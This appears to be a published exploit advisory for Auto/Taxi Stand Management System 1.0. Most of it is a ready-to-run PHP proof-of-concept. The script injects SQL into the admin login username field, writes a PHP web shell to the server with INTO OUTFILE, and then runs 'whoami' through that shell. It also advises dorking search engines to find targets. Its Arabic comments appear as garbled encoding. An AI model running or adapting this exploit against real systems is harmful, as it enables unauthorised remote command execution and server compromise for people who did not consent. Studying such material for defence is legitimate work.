=============================================================================================================================================
| # Title     : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability                                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                               |
=============================================================================================================================================

poc :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] This payload inject php code contains a back door.

[+] Line 16 + 19 Set your Target.

[+] save payload as poc.php

[+] usage from cmd : C:\www\test>php 1.php

[+] payload :

<?php
// Ø§Ù„Ù…ÙƒØªØ¨Ø§Øª Ø§Ù„Ù…Ø·Ù„ÙˆØ¨Ø©
function send_request($url, $data) {
    $options = [
        'http' => [
            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ]
    ];
    $context  = stream_context_create($options);
    return file_get_contents($url, false, $context);
}

// ØªØØ¯ÙŠØ¯ URL Ø«Ø§Ø¨Øª
$url = 'http://localhost/atsms/';

// Ù…Ø³Ø§Ø± Ø«Ø§Ø¨Øª Ù„Ø±ÙØ¹ Ø§Ù„Ù…Ù„Ù
$path = 'C:\www\atsms\uploaded.php';
$path = str_replace("\\", "\\\\", $path);

// ØÙ…ÙˆÙ„Ø© Ø§Ù„Ø¨Ø§Ø¨ Ø§Ù„Ø®Ù„ÙÙŠ
$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';

// Ø¥Ø±Ø³Ø§Ù„ Ù…Ù„Ù PHP ÙŠØØªÙˆÙŠ Ø¹Ù„Ù‰ Ø§Ù„Ø¨Ø§Ø¨ Ø§Ù„Ø®Ù„ÙÙŠ
$payload = [
    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",
    'password' => 'test',
    'login' => ''
];
send_request($url . "/admin/index.php", $payload);

echo "[+] PHP backdoor uploaded successfully at $path\n";

// ØªÙ†ÙÙŠØ° Ù…Ù„Ù PHP Ø§Ù„Ù…Ø±ÙÙˆØ¹ ÙˆØ§Ø®ØªØ¨Ø§Ø± Ø§Ù„Ø¨Ø§Ø¨ Ø§Ù„Ø®Ù„ÙÙŠ
$response = file_get_contents($url . "uploaded.php?cmd=whoami");
echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";
?>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================